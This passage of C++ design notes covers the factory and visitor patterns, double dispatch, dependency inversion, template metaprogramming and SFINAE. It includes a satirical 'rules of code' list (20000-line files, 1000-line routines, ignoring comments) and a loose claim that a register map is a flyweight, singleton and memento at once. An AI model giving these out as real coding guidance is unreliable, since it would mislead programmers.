  2. Abstract Factory: The abstract factory pattern involves a set of related factory classes that each create a different type of object. These factory classes are usually organized in a hierarchy, with a parent factory class that defines a common interface and child factory classes that implement this interface to create specific types of objects. This allows for more flexibility and scalability in creating objects, as well as the ability to add new types of objects without changing the existing code.

The factory design pattern provides several benefits, including:

  1. Encapsulation: The creation of objects is encapsulated within the factory class, which means that the creation logic can be changed without affecting the client code.

  2. Abstraction: The client code does not need to know the specific class of object being created, as it only interacts with the factory class.

  3. Flexibility: The factory class can be extended or modified to create new types of objects without having to change the existing code.

  4. Code reusability: By using a factory class, the creation code is centralized and can be reused by different parts of the program, reducing code duplication.

  5. Decoupling: The factory design pattern helps to decouple the creation of objects from the client code, which promotes a more modular and maintainable codebase.

In summary, the factory design pattern is a useful tool for creating objects in a flexible and maintainable way. It allows for the creation of objects without tightly coupling them to the client code, promoting a more modular and reusable code structure.

Example of factory pattern

Store a system configuration in an external text file and construct at runtime using the factory pattern.

Visitor pattern

The visitor design pattern is a behavioral design pattern that allows for the separation of an algorithm from the objects on which it operates. This pattern is used when there are a set of objects with different data structures and behaviors, and the algorithm needs to be applied to all of them without changing their structure or behavior.

In this pattern, a visitor class is created that contains methods for each type of object that the algorithm needs to operate on. The objects that need to be visited must implement an accept() method which takes the visitor object as a parameter. When this method is called, the visitor object can then access and manipulate the data of the object being visited.

The main benefit of using the visitor pattern is that it allows for adding new operations to a set of objects without having to modify their individual classes. This promotes the open-closed principle, where classes are open for extension but closed for modification.

One example of the visitor pattern is in a shopping cart application, where the visitor object could be a discount calculator. Each item in the shopping cart could accept the visitor object and provide access to its price, allowing the visitor to calculate and apply a discount.

Another example is in a hierarchical data structure, such as a file system. The visitor object could be a file search algorithm that visits each file and folder in the structure to find a specific file.

In summary, the visitor design pattern allows for the separation of an algorithm from the objects it operates on, promoting code reusability and maintainability. It is particularly useful in scenarios where a set of objects with different structures and behaviors need to be operated on without changing their individual classes.

Double dispatch

The visitor pattern exploits a feature of subtype polymorphism named “double dispatch.”

Double dispatch is a type of subtype polymorphism where the behavior of a method is determined by the runtime types of two objects involved in the method call. It allows for more specific and dynamic method calls based on the specific types of objects involved, rather than just the type of the calling object.

In double dispatch, the method to be executed is determined by the combination of the runtime types of both the calling object and the parameter object. This means that the same method can have different behaviors depending on the types of objects involved, allowing for more flexibility and specificity in method calls.

This is achieved through a two-step dispatch process. First, the method is dispatched based on the runtime type of the calling object. Then, within that method, another dispatch is performed based on the runtime type of the parameter object. This allows for the method to be executed based on the specific types of both objects involved, rather than just the calling object’s type.

Double dispatch is useful in situations where the behavior of a method needs to vary depending on the types of objects involved. This is often seen in scenarios where multiple classes inherit from a common superclass and have their own specific implementations of a method. By using double dispatch, the correct method can be called based on both the calling object and the parameter object, resulting in more precise and flexible code.

Example of visitor pattern

Create a class hierarchy of shapes and define methods that operate on those shapes in a visitor class.

Flyweight / singleton / memento

Hardware interface classes will typically be a const register map which is a flyweight pattern. This is also an example of a singleton pattern as it’s only initialised once regardless of how many instances are created. Additionally if registers are actually wired to discrete lines they might be read-only, so the memento pattern is used to store the internal state.


“In computer science, reflection is the ability of a process to examine, introspect, and modify its own structure and behavior.”

See Wikipedia.

Dependency inversion

Dependency inversion is a software design principle that states that high-level modules or classes should not depend on low-level modules or classes directly. Instead, they should depend on abstractions or interfaces, and the implementation of these interfaces should be provided by low-level modules or classes. This allows for loose coupling between modules or classes, making the code more flexible, reusable, and maintainable. It also allows for easier testing and the ability to swap out different implementations without affecting the high-level modules. Dependency inversion is often achieved through the use of dependency injection, where the dependencies are injected into a class or module at runtime rather than being hard-coded.

The rules of code

  1. A single file should contain fewer than 20000 lines of code
  2. It would be nice if a single routine could fit into 1000 lines of code (makes testing easier)
  3. Ensure comments are ignored by prefixing “todo”
  4. Use consistent formatting: even better, don’t bother and let clang-format do it
  5. Make things constant: it’s much easier to reason about code when the data are immutable
  6. Unit testing is awesome and will almost certainly catch on

Unit testing

A test is not a unit test if it:

See the complete article.

Template metaprogramming

“Generic programming is why we can’t have nice things” – Andrei Alexandrescu

Template metaprogramming is a technique used in C++ for writing generic code that can work with different data types at compile time. It involves using templates, which are code patterns that can be parameterized with one or more types or values. These templates are then instantiated with specific types or values at compile time, which generates specialized code for each instantiation.

The main benefit of template metaprogramming is that it allows for code reuse and flexibility, as the same code can be used with different data types without having to write separate implementations for each type. This can lead to more efficient and concise code, as well as improved performance.

One of the key features of template metaprogramming is the ability to perform compile-time computations and operations. This is made possible through the use of template parameters, which can be used in expressions and evaluated at compile time. This allows for the generation of complex and optimized code at compile time, rather than at runtime.

Template metaprogramming also makes use of template specialization, which allows for different implementations of a template for specific types or values. This can be useful for handling special cases or providing different functionality for different types.

Another important aspect of template metaprogramming is the concept of constexpr, which allows for certain functions and variables to be evaluated at compile time. This can be beneficial for performance-critical code, as it avoids the overhead of runtime function calls.

Overall, template metaprogramming is a powerful and flexible technique for writing generic code in C++. It allows for efficient and optimized code to be generated at compile time, leading to improved performance and code reuse. However, it can be complex and requires a good understanding of C++ templates and the rules of template metaprogramming.

Templates in the C++ Standard Library allow for generic programming, meaning that the same code can be used to operate on different data types without the need for separate implementations. This allows for code reuse and more efficient development.

The C++ Standard Library contains numerous template classes and functions, such as containers (e.g. vector, list, map), algorithms (e.g. sort, find, count), and iterators (e.g. begin, end). These templates can be used to perform a variety of tasks, such as storing and manipulating data, sorting and searching data, and iterating over data structures.

One of the main benefits of using templates in the C++ Standard Library is the ability to write code that is independent of specific data types. For example, the sort function can be used to sort a vector of integers, a vector of strings, or any other type of data that supports comparison. This eliminates the need for writing multiple versions of the same function for different data types.

Another benefit of templates in the C++ Standard Library is the ability to customize the behavior of classes and functions for specific data types. This is achieved through template parameters, which allow for the specification of the data type(s) to be used with a particular template. For example, the vector class can be used with a custom data type by specifying the type as a template parameter, allowing for flexibility and versatility in programming.

Lastly, templates in the C++ Standard Library also support compile-time polymorphism, also known as static polymorphism. This means that the compiler can generate specialized versions of a template at compile time based on the data types used, resulting in more efficient code execution.

Overall, templates in the C++ Standard Library play a crucial role in making the language more versatile, efficient, and flexible, allowing for the creation of powerful and reusable code.


SFINAE (Substitution Failure Is Not An Error) is a concept in C++ template programming that allows for selective compilation of code based on the availability of certain types or functions. It works by using template specialization and function overloading to check if a certain type or function is valid or "substitutable" in a given context. If the type or function is valid, the code is compiled, but if it is not, the code is discarded and the compiler moves on to the next potential option. This allows for more flexible and customizable code, as well as the ability to gracefully handle errors and special cases.